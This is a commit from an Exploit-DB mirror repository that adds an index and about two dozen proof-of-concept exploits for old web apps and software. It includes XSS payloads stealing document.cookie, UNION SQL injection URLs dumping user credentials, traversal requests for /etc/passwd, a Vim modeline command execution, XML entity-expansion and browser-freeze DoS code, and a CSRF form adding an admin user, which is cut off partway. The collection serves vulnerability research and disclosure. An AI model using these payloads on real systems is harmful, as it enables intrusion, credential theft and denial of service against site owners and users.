bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 03_18_2014

Browse source
This commit is contained in:
Offensive Security 2014-03-18 04:28:55 +00:00
parent dcd4adfd68
commit 21ed45f856
46 changed files with 889 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

45
files.csv
View file

@ -29055,3 +29055,48 @@ id,file,description,date,author,platform,type,port
32280,platforms/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script 'id' Parameter SQL Injection Vulnerability",2008-08-20,"Hussin X",php,webapps,0
32281,platforms/php/webapps/32281.cs,"Folder Lock 5.9.5 Weak Password Encryption Local Information Disclosure Vulnerability",2008-06-19,"Charalambous Glafkos",php,webapps,0
32282,platforms/php/webapps/32282.txt,"Church Edit Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0
32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 'pid' Parameter SQL Injection Vulnerability",2008-08-21,"Hussin X",php,webapps,0
32284,platforms/php/webapps/32284.txt,"Simasy CMS 'id' Parameter SQL Injection Vulnerability",2008-08-21,r45c4l,php,webapps,0
32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 '$newpm[title]' Parameter Cross-Site Scripting Vulnerability",2008-08-20,"Core Security",php,webapps,0
32286,platforms/linux/remote/32286.txt,"Fujitsu Web-Based Admin View 2.1.2 Directory Traversal Vulnerability",2008-08-21,"Deniz Cevik",linux,remote,0
32287,platforms/php/webapps/32287.txt,"FAR-PHP 1.0 'index.php' Local File Include Vulnerability",2008-08-21,"Beenu Arora",php,webapps,0
32288,platforms/php/webapps/32288.txt,"TimeTrex Time 2.2 and Attendance Module Multiple Cross-Site Scripting Vulnerabilities",2008-08-21,Doz,php,webapps,0
32289,platforms/linux/remote/32289.txt,"Vim <= 7.1.314 Insufficient Shell Escaping Multiple Command Execution Vulnerabilities",2008-08-19,"Ben Schmidt",linux,remote,0
32290,platforms/php/webapps/32290.txt,"Accellion File Transfer Multiple Cross-Site Scripting Vulnerabilities",2008-08-22,"Eric Beaulieu",php,webapps,0
32291,platforms/php/webapps/32291.txt,"PicturesPro Photo Cart 3.9 Search Cross-Site Scripting Vulnerability",2008-08-22,"Tyler Trioxide",php,webapps,0
32292,platforms/linux/dos/32292.rb,"Ruby <= 1.9 REXML Remote Denial Of Service Vulnerability",2008-08-23,"Luka Treiber",linux,dos,0
32293,platforms/php/webapps/32293.txt,"One-News Multiple Input Validation Vulnerabilities",2008-08-23,suN8Hclf,php,webapps,0
32294,platforms/windows/dos/32294.html,"Microsoft Windows Media Services 'nskey.dll' 4.1 ActiveX Control Remote Buffer Overflow Vulnerability",2008-08-22,"Jeremy Brown",windows,dos,0
32295,platforms/php/webapps/32295.txt,"PHP-Ultimate Webboard 2.0 'admindel.php' Multiple Input Validation Vulnerabilities",2008-08-25,t0pP8uZz,php,webapps,0
32296,platforms/php/webapps/32296.txt,"Bluemoon inc. PopnupBlog 3.30 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-25,Lostmon,php,webapps,0
32297,platforms/asp/webapps/32297.txt,"Smart Survey 1.0 'surveyresults.asp' Cross Site Scripting Vulnerability",2008-08-26,"Bug Researchers Group",asp,webapps,0
32298,platforms/php/webapps/32298.txt,"HP System Management Homepage (SMH) <= 2.1.12 'message.php' Cross Site Scripting Vulnerability",2008-08-26,"Luca Carettoni",php,webapps,0
32299,platforms/php/webapps/32299.txt,"MatterDaddy Market 1.1 'admin/login.php' Cross Site Scripting Vulnerability",2008-08-26,"Sam Georgiou",php,webapps,0
32300,platforms/asp/webapps/32300.txt,"Educe ASP Search Engine 1.5.6 'search.asp' Cross-Site Scripting Vulnerability",2008-08-26,JoCk3r,asp,webapps,0
32301,platforms/windows/remote/32301.py,"Kyocera Mita Scanner File Utility 3.3.0.1 File Transfer Directory Traversal Vulnerability",2008-08-26,"Seth Fogie",windows,remote,0
32302,platforms/php/webapps/32302.txt,"AbleSpace 1.0 'adv_cat.php' Cross-Site Scripting Vulnerability",2008-08-27,"Bug Researchers Group",php,webapps,0
32303,platforms/linux/remote/32303.txt,"Mono <= 2.0 'System.Web' HTTP Header Injection Vulnerability",2008-08-20,"Juraj Skripsky",linux,remote,0
32304,platforms/linux/dos/32304.txt,"Red Hat 8/9 Directory Server Crafted Search Pattern Denial of Service Vulnerability",2008-08-27,"Ulf Weltman",linux,dos,0
32305,platforms/hardware/dos/32305.txt,"Dreambox Web Interface URI Remote Denial of Service Vulnerability",2008-08-29,"Marc Ruef",hardware,dos,0
32306,platforms/php/webapps/32306.txt,"dotProject 2.1.2 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-08-29,C1c4Tr1Z,php,webapps,0
32307,platforms/php/webapps/32307.txt,"vtiger CRM 5.0.4 Multiple Cross-Site Scripting Vulnerabilities",2008-09-01,"Fabian Fingerle",php,webapps,0
32308,platforms/php/webapps/32308.txt,"GenPortal 'buscarCat.php' Cross-Site Scripting Vulnerability",2008-09-01,sl4xUz,php,webapps,0
32309,platforms/php/webapps/32309.txt,"Full PHP Emlak Script 'landsee.php' SQL Injection Vulnerability",2008-08-29,"Hussin X",php,webapps,0
32310,platforms/multiple/dos/32310.txt,"Softalk Mail Server 8.5.1 'APPEND' Command Remote Denial of Service Vulnerability",2008-09-02,Antunes,multiple,dos,0
32311,platforms/multiple/dos/32311.html,"Google Chrome 0.2.149 Malformed 'title' Tag Remote Denial of Service Vulnerability",2008-09-02,Exodus,multiple,dos,0
32312,platforms/php/webapps/32312.txt,"IDevSpot BizDirectory 2.04 'page' Parameter Cross-Site Scripting Vulnerability",2008-09-02,Am!r,php,webapps,0
32313,platforms/php/webapps/32313.txt,"OpenDB 1.0.6 user_admin.php user_id Parameter XSS",2008-08-28,C1c4Tr1Z,php,webapps,0
32314,platforms/php/webapps/32314.txt,"OpenDB 1.0.6 listings.php title Parameter XSS",2008-08-28,C1c4Tr1Z,php,webapps,0
32315,platforms/php/webapps/32315.txt,"OpenDB 1.0.6 user_profile.php redirect_url Parameter XSS",2008-08-28,C1c4Tr1Z,php,webapps,0
32316,platforms/php/webapps/32316.txt,"eliteCMS 1.0 'page' Parameter SQL Injection Vulnerability",2008-09-03,e.wiZz!,php,webapps,0
32317,platforms/php/webapps/32317.txt,"@Mail 5.42 and @Mail WebMail 5.0.5 Multiple Cross-Site Scripting Vulnerabilities",2008-09-03,C1c4Tr1Z,php,webapps,0
32318,platforms/php/webapps/32318.txt,"XRMS 1.99.2 login.php target Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32319,platforms/php/webapps/32319.txt,"OpenSupports 2.x - Auth Bypass/CSRF Vulnerabilities",2014-03-17,"TN CYB3R",php,webapps,0
32320,platforms/php/webapps/32320.txt,"XRMS 1.99.2 activities/some.php title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32321,platforms/php/webapps/32321.txt,"XRMS 1.99.2 companies/some.php company_name Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32322,platforms/php/webapps/32322.txt,"XRMS 1.99.2 contacts/some.php last_name Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32323,platforms/php/webapps/32323.txt,"XRMS 1.99.2 campaigns/some.php campaign_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32324,platforms/php/webapps/32324.txt,"XRMS 1.99.2 opportunities/some.php opportunity_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32325,platforms/php/webapps/32325.txt,"XRMS 1.99.2 cases/some.php case_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32326,platforms/php/webapps/32326.txt,"XRMS 1.99.2 files/some.php file_id Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32327,platforms/php/webapps/32327.txt,"XRMS 1.99.2 reports/custom/mileage.php starting Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0

Can't render this file because it is too large.

9
platforms/asp/webapps/32297.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30841/info
Smart Survey is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Smart Survey 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/surveyresults.asp?folder=/123adminxyz/SmartSurve/&title=example.com&sid=[XSS]

9
platforms/asp/webapps/32300.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30849/info
ASP Search Engine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
ASP Search Engine 1.5.6 is vulnerable; other versions may also be affected.
http://www.example.com/resource/searchdemo/search.asp?look_for="><script>alert("JoCk3r")</script>

10
platforms/hardware/dos/32305.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30919/info
Dreambox is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected device, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
Dreambox DM500C is vulnerable; other models may also be affected.
open|send GET http://www.example.com/aaa(...)
HTTP/1.0\n\n|sleep|close|pattern_not_exists HTTP/1.# ### *

30
platforms/linux/dos/32292.rb Executable file
View file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/30802/info
Ruby is prone to a remote denial-of-service vulnerability in its REXML module.
Successful exploits may allow remote attackers to cause denial-of-service conditions in applications that use the vulnerable module.
Versions up to and including Ruby 1.9.0-3 are vulnerable.
#!/usr/bin/env ruby
require 'rexml/document'
doc = REXML::Document.new(<<END)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE member [
<!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
<!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
<!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
<!ENTITY e "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
<!ENTITY f "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
<!ENTITY g "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
]>
<member>
&a;
</member>
END
puts doc.root.text.size

12
platforms/linux/dos/32304.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/30871/info
Red Hat Directory Server is prone to a denial-of-service vulnerability because the server fails to handle specially crafted search patterns.
An attacker can exploit this issue to consume CPU resources with one search request, effectively blocking additional search requests from executing. Legitimate users may be prevented from authenticating to network resources that use the affected server for authentication.
Red Hat Directory Server 7.1 and 8 are affected.
The following example regular expressions are available:
2.6/AV:N/AC:H/Au:N/C:N/I:N/A:P
4.0/AV:N/AC:L/Au:S/C:N/I:N/A:P

13
platforms/linux/remote/32286.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/30780/info
Fujitsu Web-Based Admin View is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the application's HTTP server.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
Web-Based Admin View 2.1.2 is vulnerable; other versions may also be affected.
The following example is available:
GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0
Host: www.example.com:8081

23
platforms/linux/remote/32289.txt Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/30795/info
Vim is prone to multiple command-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Successfully exploiting these issues can allow an attacker to execute arbitrary commands with the privileges of the user running the affected application.
Versions prior to Vim 7.2.010 are vulnerable.
Copy-and-paste these examples into separate files:
;xclock
vim: set iskeyword=;,@
Place your cursor on ``xclock'', and press K. xclock appears.
;date>>pwned
vim: set iskeyword=1-255
Place your cursor on ``date'' and press K. File ``pwned'' is created in
the current working directory.
Please note: If modeline processing is disabled, set the 'iskeyword'
option manually.

9
platforms/linux/remote/32303.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30867/info
Mono is prone to a vulnerability that allows attackers to inject arbitrary HTTP headers because it fails to sanitize input.
By inserting arbitrary headers into an HTTP response, attackers may be able to launch cross-site request-forgery, cross-site scripting, HTTP-request-smuggling, and other attacks.
This issue affects Mono 2.0 and earlier.
<script runat="server"> void Page_Load(object o, EventArgs e) { // Query parameter text is not checked before saving in user cookie NameValueCollection request = Request.QueryString; // Adding cookies to the response Response.Cookies["userName"].Value = request["text"]; } </script>

10
platforms/multiple/dos/32310.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30970/info
Softalk Mail Server is prone to a remote denial-of-service vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
Softalk Mail Server 8.5.1 is vulnerable; other versions may also be affected.
APPEND Ax5000 (UIDNEXT MESSAGES)

11
platforms/multiple/dos/32311.html Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/30975/info
Google Chrome is prone to a remote denial-of-service vulnerability because it fails to handle user-supplied input.
Attackers can exploit this issue to make the application unresponsive, denying service to legitimate users.
Google Chrome 0.2.149.27 is vulnerable; other versions may also be affected.
NOTE: Reports indicate that this issue may not be exploitable as described and may depend on a particular WebKit configuration.
<!-- Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit Exploit written by Exodus. http://www.blackhat.org.il http://www.blackhat.org.il/index.php/ready-set-chrome/ http://www.blackhat.org.il/exploits/chrome-freeze-exploit.html --> <HTML> <HEAD> <TITLE> Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit</TITLE> <SCRIPT language="JavaScript"> function buff(len) { var buffer; for(var i = 0; i != len; i++) { buffer += 'E';} return buffer; } </SCRIPT> </HEAD> <SCRIPT> document.write('<body title=\"' + buff(31337) + '\">'); </SCRIPT> </BODY> </HTML>

9
platforms/php/webapps/32283.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30772/info
DXShopCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DXShopCart 4.30mc is vulnerable; other versions may also be affected.
http://www.example.com.com/product_detail.php?cid=12&pid=-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16--

7
platforms/php/webapps/32284.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30774/info
Simasy CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com.com/index.php?page=8&id=95+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,email,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3+from+users/*

9
platforms/php/webapps/32285.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30777/info
vBulletin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
vBulletin 3.7.2 Patch Level 1 and vBulletin 3.6.10 Patch Level 3 are vulnerable; other versions may also be affected.
--></script><script>alert(/xss/.source)</script><!--

7
platforms/php/webapps/32287.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30781/info
FAR-PHP is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
http://www.example.com/farver/index.php?c=/../../../../../../../../boot.ini%00

10
platforms/php/webapps/32288.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30789/info
TimeTrex is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
TimeTrex versions 2.2.12 and previous are vulnerable.
http://www.example.com/interface/Login.php?user_name=admin&password=XSS
http://www.example.com/interface/Login.php?user_name=XSS

10
platforms/php/webapps/32290.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30796/info
Accellion File Transfer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Accellion File Transfer FTA_7_0_135 is vulnerable; prior versions may also be affected.
https://www.example.com/courier/forgot_password.html/>"><script>alert(document.cookie)</script>

9
platforms/php/webapps/32291.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30798/info
Photo Cart is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Photo Cart 3.9 is vulnerable; other versions may also be affected.
POST <script>alert(document.cookie)</script> to "Gallery or event name" field

9
platforms/php/webapps/32293.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30804/info
One-News is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and multiple HTML-injection issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Beta 2 of One-News is prone to these issues.
http://www.example.com/onenews_beta2/index.php?q=3' and 1=2 union select 1,2,3/*

9
platforms/php/webapps/32295.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30822/info
PHP-Ultimate Webboard is prone multiple-input validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Successful exploits will allow unauthorized attackers to delete arbitrary questions and answers. Attackers may also exploit these issues to perform SQL-injection attacks.
PHP-Ultimate Webboard 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/webboard/admindel.php?action=delete&mode=question&qno=[NUM]&ano=[NUM]

9
platforms/php/webapps/32296.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30827/info
Bluemoon inc. PopnupBlog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
PopnupBlog 3.30 is affected; other versions may also be vulnerable.
http://www.example.com/modules/popnupblog/index.php?param=1">[XSS-CODE]&start=0,10&cat_id=&view=1 http://www.example.com/modules/popnupblog/index.php?param=&start=0,10&cat_id=">[XSS-CODE]&view=1 http://www.example.com/modules/popnupblog/index.php?param=&start=0,10&cat_id=&view=1">[XSS-CODE]

9
platforms/php/webapps/32298.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30846/info
HP System Management Homepage (SMH) is prone to a cross-site scripting vulnerability.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected site. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
NOTE: This issue may stem from an incomplete fix for the issues discussed in BIDs 24256 (HP System Management Homepage (SMH) Unspecified Cross Site Scripting Vulnerability) and 25953 (HP System Management Homepage (SMH) for Linux, Windows, and HP-UX Cross Site Scripting Vulnerability), but Symantec has not confirmed this.
1st vector) https://www.example.com/message.php?<script><script>alert('xss')</script></script> 2nd vector) https://www.example.com/message.php?aa%00<script><script>alert('xss')</script></script> 3rd vector) https://www.example.com/message.php?aa<BGSOUND SRC="javascript:alert('XSS');">

9
platforms/php/webapps/32299.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30848/info
MatterDaddy Market is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
MatterDaddy Market 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/dir(s)/admin/login.php?msg=[XSS]

9
platforms/php/webapps/32302.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30864/info
AbleSpace is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects AbleSpace 1.0 and earlier.
http://www.example.com/adv_cat.php?find_str="><script>alert('1')</script>&cat_id=1&razd_id=&x=0&y=0

11
platforms/php/webapps/32306.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/30924/info
dotProject is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Attackers may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
dotProject 2.1.2 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?m=tasks&inactive=toggle"> http://www.example.com/index.php?m=calendar&a=day_view&date=20080828"> http://www.example.com/index.php?m=public&a=calendar&dialog=1&callback=setCalendar"> http://www.example.com/index.php?m=ticketsmith&type=My'> http://www.example.com/index.php?m=projects&tab=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user_id,user_username,user_password),14,15,16,17,18,19,20,21,22 FROM users--

11
platforms/php/webapps/32307.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/30951/info
vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
vtiger CRM 5.0.4 is vulnerable; other versions may also be affected.
http://www.example.com/vtigercrm/index.php?module=Products&action=index&parenttab="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Users&action=Authenticate&user_password="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string="><script>alert(1);</script>

7
platforms/php/webapps/32308.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30957/info
GenPortal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/path/buscarCat.php?palBuscar=[XSS]

9
platforms/php/webapps/32309.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30962/info
Full PHP Emlak Script is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/Script/landsee.php?id=-9+union+select+1,2,3,concat(username,0x3a,sifre),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75+FROM+admin--

9
platforms/php/webapps/32312.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30980/info
IDevSpot BizDirectory is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
BizDirectory 2.04 is vulnerable; other verisons may also be affected.
http://www.example.com/?page=[XsS]&mode=search

9
platforms/php/webapps/32313.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30989/info
Open Media Collectors Database (OpenDb) is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
OpenDb 1.0.6 is vulnerable; other versions may also be affected.
http://www.example.com/user_admin.php?op=edit&user_id=<img/src/onerror=alert(document.cookie)>

9
platforms/php/webapps/32314.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30989/info
Open Media Collectors Database (OpenDb) is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
OpenDb 1.0.6 is vulnerable; other versions may also be affected.
http://www.example.com/listings.php?search_list=y&linked_items=include&title_match=partial&title=<img/src/onerror=alert(document.cookie)>

9
platforms/php/webapps/32315.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30989/info
Open Media Collectors Database (OpenDb) is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
OpenDb 1.0.6 is vulnerable; other versions may also be affected.
http://www.example.com/user_profile.php?uid=[USERNAME]&subject=No+Subject&redirect_link=Back+to+Statistics&redirect_url=javascript:alert(document.cookie)

11
platforms/php/webapps/32316.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/30990/info
eliteCMS is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
eliteCMS 1.0 and 1.01 are vulnerable; other versions may also be affected.
http://www.example.com/index.php?page=-1%20union%20all%20select%201,2,3,4,user_name,h_password%20from%20users/*
http://www.example.com/index.php?page=-1'+union+select+1,concat(user_name,0x3a,h_password),3,4,5,6,7,8,9,10,11+from+users+limit+0,1/*

14
platforms/php/webapps/32317.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/30992/info
@Mail and @Mail WebMail are prone to multiple cross-site scripting vulnerabilities because the applications fail to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
These issues affect the following versions:
@Mail WebMail 5.05 running on Microsoft Windows
@Mail 5.42 running on CentOS
Other versions running on different platforms may also be affected.
http://www.example.com/parse.php?file="><img/src/onerror=alert(document.cookie)> http://www.example.com/parse.php?file=html/english/help/filexp.html&FirstLoad=1&HelpFile=';}onload=function(){alert(0);foo=' http://www.example.com/showmail.php?Folder=Spam';document.location='\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0077\u0069\u0074\u0068\u0028\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u0029\u0061\u006C\u0065\u0072\u0074\u0028\u0063\u006F\u006F\u006B\u0069\u0065\u0029';foo=' http://www.example.com/abook.php?func=view&abookview=global"><img/src/onerror="alert(document.cookie)&email=138195 http://www.example.com/showmail.php?Folder=Inbox&sort=EmailSubject&order=desc&start="><iframe/src="javascript:alert(document.cookie)

7
platforms/php/webapps/32318.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/login.php?target="><script>alert(1);</script>

59
platforms/php/webapps/32319.txt Executable file
View file

@ -0,0 +1,59 @@
[+] Author: TUNISIAN CYBER
[+] Exploit Title: OpenSupports v2.x AuthBypass/CSRF Vulnerabilities
[+] Date: 15-03-2014
[+] Category: WebApp
[+] Version: 2.x
[+] Tested on: KaliLinux/Windows 7 Pro
[+] CWE: CWE-302/CWE-89
[+] Vendor: http://www.opensupports.com/
[+] Friendly Sites: na3il.com,th3-creative.com
[+] Twitter: @TCYB3R
1.OVERVIEW:
OpenSupports v2.x suffers from a CSRF and authentication bypass Vulnerabilities.
2.Version:
2.x
3.Background:
http://www.opensupports.com/wiki/index.php?title=Main_Page
4.Proof Of Concept:
CSRF:Add Staff Members
<html>
<form method="POST" name="form0" action="http://localhost/demo/admin/staffadmin.php?id=agregar">
<input type="hidden" name="nombre" value="TCYB3Rx20x"/>
<input type="hidden" name="email" value="g4k@hotmail.esxxx"/>
